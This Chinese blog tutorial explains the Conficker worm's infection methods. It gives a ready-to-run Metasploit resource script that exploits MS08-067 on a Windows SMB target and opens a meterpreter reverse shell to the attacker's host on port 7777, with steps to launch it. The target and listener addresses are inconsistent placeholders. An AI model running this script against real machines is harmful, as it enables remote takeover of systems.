• 【Python脚本进阶】2.4、conficker蠕虫(上):Metasploit攻击Windows SMB服务


    目录

    一、简介

    1.1、分析:

    二、Metasploit攻击Windows SMB服务

    2.1、分析:

    2.2、示例:


    一、简介

    1.1、分析:

    在其基本的感染方法中, Conficker蠕虫使用了两种不同的攻击方法。

    1、利用了Windows服务器中一个服务的Oday漏洞。利用这个栈溢出漏洞, 蠕虫能在被感染的主机上执行shellcode并下载蠕虫。

    2、Conficker蠕虫暴力破解默认的管理员网络共享(ADMN$)的口令以获取肉机访问权。



    二、Metasploit攻击Windows SMB服务

    2.1、分析:

    利用Metasploit框架(http://metasploit.com/download/)简化攻击代码。作为一个开源计算机安全项目,很快就被广泛使用, 并且已经变成了一个漏洞利用代码的开发工具包。


    Metasploit能让渗透测试人员在标准化和脚本化的环境中运行数以千计的不同的计算机漏洞利用代码。在Con.ticker蠕虫中使用的漏洞曝光后不久, HDMoore就将一个有效的漏洞利用代码整合进了框架内—-MS08-067 _netapi

    2.2、示例:

    虽然攻击者可以通过交互驱动的方式使用Metasploit, 但Metasploit也能读取批处理脚本(re)完成攻击。在攻击时,Metasploit会顺序执行批处理文件中的命令。


    如使用ms08 _ 067 netapi (Conficker)攻击“ 肉机” (192.168.x.x), 使之与我们自己的主机192.168.xx.xx的7777端口建立一个反向shell

    1. use exploit/windows/smb/ms08_ 067_netapi
    2. set RHOST 192.168.x.x
    3. set PAYLOAD windows/meterpreter/reverse_tcp
    4. set LHOST 192.168.xx.xx
    5. set LPORT 7777
    6. exploit -j -z

    使用Metasploit进行攻击时, 先选好要用的漏洞利用代码(exploit/windows/smb/ms08 _ 067 _ netapi)

    选定目标,目标设置为192.168.1.37

    设定负载为windows/meterpreter/reverse _ tcp

    将反向连接的目标设为主机192.168.77.77, 端口为7777

    最后Metasploit去实施攻击。


    将上面这些代码保存为文件conficker.rc。只要输入命令msfconsole -r conficker.rc, 就能发起攻击。这条命令让Metasploit运行脚本conficker.rc中的指令。如果攻击成功, 会返回一个让我们能控制目标计算机的Windows 命令行shell。

  • 相关阅读:
    Java输入开始时间和结束时间获取到对应的年月
    基于Vue+ElementUI+Springboot劳动仲裁法院纠纷调解系统
    【教程7】疯壳·ARM功能手机-BLE透传实验教程
    老子云概述
    UE4 C++设计模式:享元模式(Flyweight Pattern)
    图像滤波总结
    【PostgreSQL】创建表和复制表
    大语言模型LangChain+ChatGLM3-6B的本地知识库与行业知识库价值体现
    Vue3项目中使用插槽
    SOFAJRaft 日志复制共识算法
  • 原文地址:https://blog.csdn.net/qq_53079406/article/details/126077115